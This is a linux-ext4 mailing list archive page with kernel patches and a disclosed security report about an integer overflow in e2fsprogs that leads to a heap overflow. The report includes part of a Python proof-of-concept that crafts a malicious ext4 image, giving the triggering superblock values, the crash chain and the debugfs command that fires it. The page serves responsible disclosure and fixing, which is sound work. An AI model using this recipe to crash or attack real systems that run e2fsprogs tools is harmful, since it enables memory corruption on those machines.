Linux EXT4 FS development
 help / color / mirror / Atom feed
* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08  9:49 UTC (permalink / raw)
  To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>

[-- Attachment #1: Type: text/plain, Size: 949 bytes --]

Hello Feng Xue,
thank you for your report.  The inode blocks overflow looks legitimate, and trivial to fix.  The reproducer is a bit strange, since it is a python script that generates a synthetic ext4 image directly rather than writing an e2fsck test case like "f_64kblock" using mke2fs to create the filesystem with mostly appropriate parameters, and debugfs to overwrite the values.

Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.

A patch is attached with the trivial code fix for review and includes a test case.


The debugfs issue seems less important, since this requires the administrator to run the specific debugfs command on the specific file.  

> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
> 
> Hi there,
> 
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
> 
> Best,
> Feng


Cheers, Andreas


[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]

^ permalink raw reply

* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08  7:31 UTC (permalink / raw)
  To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
	linux-ext4, linux-kernel, lidiangang
  Cc: Fengnan Chang

When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.

Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS

Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS

Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
  5.33%  [kernel]  [k] __iomap_dio_rw
  3.26%  [kernel]  [k] iomap_iter
  2.37%  [kernel]  [k] iomap_dio_bio_iter
  2.35%  [kernel]  [k] kfree
  1.33%  [kernel]  [k] iomap_dio_complete

Introduce simple reads to reduce the overhead of iomap, simple read path
is triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.

After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
  4.83%  [kernel]  [k] iomap_dio_simple_read

With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.

Below are the test results using fio:

fs    workload       qd    simple=0      simple=1      gain
ext4  libaio         1     18,768        18,796        +0.15%
ext4  libaio         64    462,459       479,435       +3.67%
ext4  libaio         128   462,427       478,411       +3.46%
ext4  libaio         256   461,579       477,561       +3.46%
ext4  io_uring       1     18,898        18,914        +0.08%
ext4  io_uring       64    564,405       590,145       +4.56%
ext4  io_uring       128   563,322       592,365       +5.16%
ext4  io_uring       256   562,281       590,593       +5.04%
ext4  io_uring_poll  1     19,292        19,271        -0.11%
ext4  io_uring_poll  64    994,612       1,006,334     +1.18%
ext4  io_uring_poll  128   1,421,945     1,518,535     +6.79%
ext4  io_uring_poll  256   1,576,507     1,772,901     +12.46%
xfs   libaio         1     18,778        18,781        +0.01%
xfs   libaio         64    459,617       476,411       +3.65%
xfs   libaio         128   461,642       477,571       +3.45%
xfs   libaio         256   459,828       475,224       +3.35%
xfs   io_uring       1     18,898        18,923        +0.13%
xfs   io_uring       64    557,195       583,320       +4.69%
xfs   io_uring       128   560,109       585,549       +4.54%
xfs   io_uring       256   559,117       581,846       +4.07%
xfs   io_uring_poll  1     19,257        19,301        +0.23%
xfs   io_uring_poll  64    983,827       998,497       +1.49%
xfs   io_uring_poll  128   1,389,644     1,489,604     +7.19%
xfs   io_uring_poll  256   1,523,554     1,702,827     +11.77%

v4:
fix fserror report and update test data based on v7.1-rc3.

v3:
Test data updated based on v7.1-rc3.

Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
 fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 376 insertions(+), 14 deletions(-)

diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
 #include <linux/iomap.h>
 #include <linux/task_io_accounting_ops.h>
 #include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
 #include "internal.h"
 #include "trace.h"
 
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
 	return FSERR_DIRECTIO_READ;
 }
 
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
 {
-	switch (dio->error) {
+	switch (error) {
 	case 0:
 	case -EAGAIN:
 	case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
 
 	if (dops && dops->end_io)
 		ret = dops->end_io(iocb, dio->size, ret, dio->flags);
-	if (should_report_dio_fserror(dio))
+	if (should_report_dio_fserror(dio->error))
 		fserror_report_io(file_inode(iocb->ki_filp),
 				  iomap_dio_err_type(dio), offset, dio->size,
 				  dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
 	iomap_dio_complete_work(&dio->aio.work);
 }
 
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+		unsigned int dio_flags, bool error)
 {
-	struct iomap_dio *dio = bio->bi_private;
-
 	if (bio_integrity(bio))
 		fs_bio_integrity_free(bio);
 
-	if (dio->flags & IOMAP_DIO_BOUNCE) {
-		bio_iov_iter_unbounce(bio, !!dio->error,
-				dio->flags & IOMAP_DIO_USER_BACKED);
+	if (dio_flags & IOMAP_DIO_BOUNCE) {
+		bio_iov_iter_unbounce(bio, error,
+				dio_flags & IOMAP_DIO_USER_BACKED);
 		bio_put(bio);
-	} else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+	} else if (dio_flags & IOMAP_DIO_USER_BACKED) {
 		bio_check_pages_dirty(bio);
 	} else {
 		bio_release_pages(bio, false);
 		bio_put(bio);
 	}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+	struct iomap_dio *dio = bio->bi_private;
+
+	iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
 
 	/* Do not touch bio below, we just gave up our reference. */
 
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
 	return ret;
 }
 
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+		struct block_device *bdev, unsigned int dio_flags)
+{
+	if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+		return i_blocksize(inode);
+	return bdev_logical_block_size(bdev);
+}
+
 static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 {
 	const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
 	 * File systems that write out of place and always allocate new blocks
 	 * need each bio to be block aligned as that's the unit of allocation.
 	 */
-	if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
-		alignment = fs_block_size;
-	else
-		alignment = bdev_logical_block_size(iomap->bdev);
+	alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
 
 	if ((pos | length) & (alignment - 1))
 		return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 }
 EXPORT_SYMBOL_GPL(__iomap_dio_rw);
 
+struct iomap_dio_simple_read {
+	struct kiocb		*iocb;
+	size_t			size;
+	unsigned int		dio_flags;
+	atomic_t		state;
+	union {
+		struct task_struct	*waiter;
+		struct work_struct	work;
+	};
+	/*
+	 * Align @bio to a cacheline boundary so that, combined with the
+	 * front_pad passed to bioset_init(), the bio sits at the start of
+	 * a cacheline in memory returned by the (HWCACHE-aligned) bio
+	 * slab.  This keeps the hot fields block layer touches on submit
+	 * and completion (bi_iter, bi_status, ...) within a single line.
+	 */
+	struct bio	bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+	IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+	IOMAP_DIO_SIMPLE_QUEUED,
+	IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+		struct bio *bio, ssize_t ret)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (likely(!ret)) {
+		ret = sr->size;
+		iocb->ki_pos += ret;
+	} else if (should_report_dio_fserror(ret)) {
+		fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+				  sr->size, ret, GFP_NOFS);
+	}
+
+	iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+	return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+		struct bio *bio)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	ssize_t ret;
+
+	WRITE_ONCE(iocb->private, NULL);
+
+	ret = iomap_dio_simple_read_finish(iocb, bio,
+			blk_status_to_errno(bio->bi_status));
+
+	inode_dio_end(inode);
+	trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+	return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+	struct iomap_dio_simple_read *sr =
+		container_of(work, struct iomap_dio_simple_read, work);
+	struct kiocb *iocb = sr->iocb;
+	ssize_t ret;
+
+	ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+	iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+	struct kiocb *iocb = sr->iocb;
+
+	if (unlikely(sr->bio.bi_status)) {
+		struct inode *inode = file_inode(iocb->ki_filp);
+
+		INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+		queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+		return;
+	}
+
+	iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+	struct iomap_dio_simple_read *sr = bio->bi_private;
+
+	if (sr->waiter) {
+		struct task_struct *waiter = sr->waiter;
+
+		WRITE_ONCE(sr->waiter, NULL);
+		blk_wake_io_task(waiter);
+		return;
+	}
+
+	if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+	    atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+			   IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+		iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+		struct iov_iter *iter, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+
+	if (iov_iter_rw(iter) != READ)
+		return false;
+	if (!count)
+		return false;
+	/*
+	 * Simple read is an optimization for small IO. Filter out large IO
+	 * early as it's the most common case to fail for typical direct IO
+	 * workloads.
+	 */
+	if (count > inode->i_sb->s_blocksize)
+		return false;
+	if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+		return false;
+	if (iocb->ki_pos + count > i_size_read(inode))
+		return false;
+
+	return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+		struct iov_iter *iter, const struct iomap_ops *ops,
+		void *private, unsigned int dio_flags)
+{
+	struct inode *inode = file_inode(iocb->ki_filp);
+	size_t count = iov_iter_count(iter);
+	int nr_pages;
+	struct iomap_dio_simple_read *sr;
+	unsigned int alignment;
+	struct iomap_iter iomi = {
+		.inode		= inode,
+		.pos		= iocb->ki_pos,
+		.len		= count,
+		.flags		= IOMAP_DIRECT,
+		.private	= private,
+	};
+	struct bio *bio;
+	bool wait_for_completion = is_sync_kiocb(iocb);
+	ssize_t ret;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+	else
+		nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		iomi.flags |= IOMAP_NOWAIT;
+
+	ret = kiocb_write_and_wait(iocb, count);
+	if (ret)
+		return ret;
+
+	inode_dio_begin(inode);
+
+	ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+			       &iomi.iomap, &iomi.srcmap);
+	if (ret) {
+		inode_dio_end(inode);
+		return ret;
+	}
+
+	if (iomi.iomap.type != IOMAP_MAPPED ||
+	    iomi.iomap.offset > iomi.pos ||
+	    iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+	    (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+		ret = -ENOTBLK;
+		goto out_iomap_end;
+	}
+
+	alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+	if ((iomi.pos | count) & (alignment - 1)) {
+		ret = -EINVAL;
+		goto out_iomap_end;
+	}
+
+	if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+		ret = sb_init_dio_done_wq(inode->i_sb);
+		if (ret < 0)
+			goto out_iomap_end;
+	}
+
+	trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+	if (user_backed_iter(iter))
+		dio_flags |= IOMAP_DIO_USER_BACKED;
+
+	bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+			       REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+			       GFP_KERNEL, &iomap_dio_simple_read_pool);
+	sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+	fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+	sr->iocb = iocb;
+	sr->dio_flags = dio_flags;
+
+	bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+	bio->bi_ioprio = iocb->ki_ioprio;
+	bio->bi_private = sr;
+	bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		ret = bio_iov_iter_bounce(bio, iter, count);
+	else
+		ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+	if (unlikely(ret))
+		goto out_bio_put;
+
+	if (bio->bi_iter.bi_size != count) {
+		iov_iter_revert(iter, bio->bi_iter.bi_size);
+		ret = -ENOTBLK;
+		goto out_bio_release_pages;
+	}
+
+	sr->size = bio->bi_iter.bi_size;
+
+	if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+	    !(dio_flags & IOMAP_DIO_BOUNCE))
+		bio_set_pages_dirty(bio);
+
+	if (iocb->ki_flags & IOCB_NOWAIT)
+		bio->bi_opf |= REQ_NOWAIT;
+	if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+		bio->bi_opf |= REQ_POLLED;
+		bio_set_polled(bio, iocb);
+		WRITE_ONCE(iocb->private, bio);
+	}
+
+	if (wait_for_completion) {
+		sr->waiter = current;
+		blk_crypto_submit_bio(bio);
+	} else {
+		atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+		sr->waiter = NULL;
+		blk_crypto_submit_bio(bio);
+		ret = -EIOCBQUEUED;
+	}
+
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+			       &iomi.iomap);
+
+	if (wait_for_completion) {
+		for (;;) {
+			set_current_state(TASK_UNINTERRUPTIBLE);
+			if (!READ_ONCE(sr->waiter))
+				break;
+			blk_io_schedule();
+		}
+		__set_current_state(TASK_RUNNING);
+
+		ret = iomap_dio_simple_read_finish(iocb, bio,
+				blk_status_to_errno(bio->bi_status));
+		inode_dio_end(inode);
+		trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+					 ret > 0 ? ret : 0);
+	} else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+				  IOMAP_DIO_SIMPLE_QUEUED) ==
+		   IOMAP_DIO_SIMPLE_DONE) {
+		ret = iomap_dio_simple_read_complete(iocb, bio);
+	} else {
+		trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+	}
+
+	return ret;
+
+out_bio_release_pages:
+	if (dio_flags & IOMAP_DIO_BOUNCE)
+		bio_iov_iter_unbounce(bio, true, false);
+	else
+		bio_release_pages(bio, false);
+out_bio_put:
+	bio_put(bio);
+out_iomap_end:
+	if (ops->iomap_end)
+		ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+			       &iomi.iomap);
+	inode_dio_end(inode);
+	return ret;
+}
+
 ssize_t
 iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 		const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
 		unsigned int dio_flags, void *private, size_t done_before)
 {
 	struct iomap_dio *dio;
+	ssize_t ret;
+
+	/*
+	 * Fast path for small, block-aligned reads that map to a single
+	 * contiguous on-disk extent.
+	 *
+	 * @dops must be NULL: a non-NULL @dops means the caller wants its
+	 * ->end_io / ->submit_io hooks invoked, and in particular wants its
+	 * bios to be allocated from the filesystem-private @dops->bio_set
+	 * (whose front_pad sizes a filesystem-private wrapper around the
+	 * bio).  The fast path instead allocates from the shared
+	 * iomap_dio_simple_read_pool, whose front_pad matches
+	 * struct iomap_dio_simple_read; the two wrappers are not
+	 * interchangeable, so we must fall back to __iomap_dio_rw() in
+	 * that case.
+	 *
+	 * @done_before must be zero: a non-zero caller-accumulated residual
+	 * cannot be carried through a single-bio inline completion.
+	 *
+	 * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+	 * when it decides the request does not fit the fast path.
+	 * In that case we proceed to the generic __iomap_dio_rw() slow
+	 * path.  Any other errno is a real result and is propagated as-is,
+	 * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+	 */
+	if (!dops && !done_before &&
+	    iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+		ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+		if (ret != -ENOTBLK)
+			return ret;
+	}
 
 	dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
 			     done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
 	return iomap_dio_complete(dio);
 }
 EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+	return bioset_init(&iomap_dio_simple_read_pool, 4,
+			   offsetof(struct iomap_dio_simple_read, bio),
+			   BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
-- 
2.39.5 (Apple Git-154)

^ permalink raw reply related

* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08  6:52 UTC (permalink / raw)
  To: Theodore Ts'o, Andreas Dilger
  Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
	linux-ext4, linux-kernel, Aditya Prakash Srivastava,
	syzbot+0c89d865531d053abb2d

When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.

If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.

Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().

Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
 fs/ext4/inode.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,
 
 	BUG_ON(!ext4_handle_valid(handle));
 
-	if (ext4_has_inline_data(inode))
+	if (ext4_has_inline_data(inode) &&
+	    ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
 		return ext4_write_inline_data_end(inode, pos, len, copied,
 						  folio);
 
-- 
2.47.3


^ permalink raw reply related

* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08  6:11 UTC (permalink / raw)
  To: linux-ext4
  Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
	Sashiko

The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().

If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum.  Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.

Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.

Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
 fs/ext4/super.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
 		sbi->s_cluster_bits = 0;
 	}
 	sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
-	if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
-		ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+	if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_clusters_per_group & 7) {
+		ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
 			 sbi->s_clusters_per_group);
 		return -EINVAL;
 	}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
 		return -EINVAL;
 	}
 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
-	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+	    sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+	    sbi->s_inodes_per_group & 7) {
 		ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
 			 sbi->s_inodes_per_group);
 		return -EINVAL;
-- 
2.43.7


^ permalink raw reply related

* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08  2:25 UTC (permalink / raw)
  To: Peng Wang
  Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
	linux-ext4, inux-kernel
In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>

On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock.  It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call.  When a write
> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length.  ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.

For the aligned case, the overwrite check can now be skipped entirely.

For non-aligned cases, you can optimistically hold the read lock and then
use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.



^ permalink raw reply

* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC (permalink / raw)
  To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org


[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]

Hi there,

I'd like to report two potential security bugs for your review.
detailed report and pocs attached.

Best,
Feng

[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]

#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.

Bug:
    fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
                                   EXT2_INODE_SIZE(fs->super) +
                                   EXT2_BLOCK_SIZE(fs->super) - 1) /
                                  EXT2_BLOCK_SIZE(fs->super));

The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.

Strategy:
  - blocksize = 65536  (s_log_block_size = 6)
  - inode_size = 16384  (power of 2, >= 128, <= blocksize)
  - s_inodes_per_group = 0x40001 = 262145
  - product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
  - inode_blocks_per_group = ceil(16384 / 65536) = 1  (should be 65537!)
  - Only 1 block (64K) of inode table is considered valid per group, but
    the fs claims 262145 inodes per group. Accessing any inode beyond the
    first 4 (65536/16384=4) triggers OOB reads from the inode table.
  - The inode bitmap check requires inodes_per_group/8 <= blocksize.
    262145/8 = 32768 <= 65536. Passes.

Crash chain (inode scan path):
  1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
  2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
  3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
  4. get_next_blocks returns num_blocks=0, bytes_left=0
  5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
  6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
     => cast to size_t = huge value => heap buffer overflow

Trigger: debugfs crafted.img -R "lsdel"
         (any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""

import struct
import sys
import os
import subprocess

# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT       = 0x00   # __u32
OFF_BLOCKS_COUNT       = 0x04   # __u32
OFF_R_BLOCKS_COUNT     = 0x08   # __u32
OFF_FREE_BLOCKS_COUNT  = 0x0C   # __u32
OFF_FREE_INODES_COUNT  = 0x10   # __u32
OFF_FIRST_DATA_BLOCK   = 0x14   # __u32
OFF_LOG_BLOCK_SIZE     = 0x18   # __u32
OFF_LOG_CLUSTER_SIZE   = 0x1C   # __u32
OFF_BLOCKS_PER_GROUP   = 0x20   # __u32
OFF_CLUSTERS_PER_GROUP = 0x24   # __u32
OFF_INODES_PER_GROUP   = 0x28   # __u32
OFF_MAGIC              = 0x38   # __u16
OFF_STATE              = 0x3A   # __u16
OFF_REV_LEVEL          = 0x4C   # __u32
OFF_FIRST_INO          = 0x54   # __u32
OFF_INODE_SIZE         = 0x58   # __u16
OFF_FEATURE_COMPAT     = 0x5C   # __u32
OFF_FEATURE_INCOMPAT   = 0x60   # __u32
OFF_FEATURE_RO_COMPAT  = 0x64   # __u32
OFF_DESC_SIZE          = 0xFE   # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
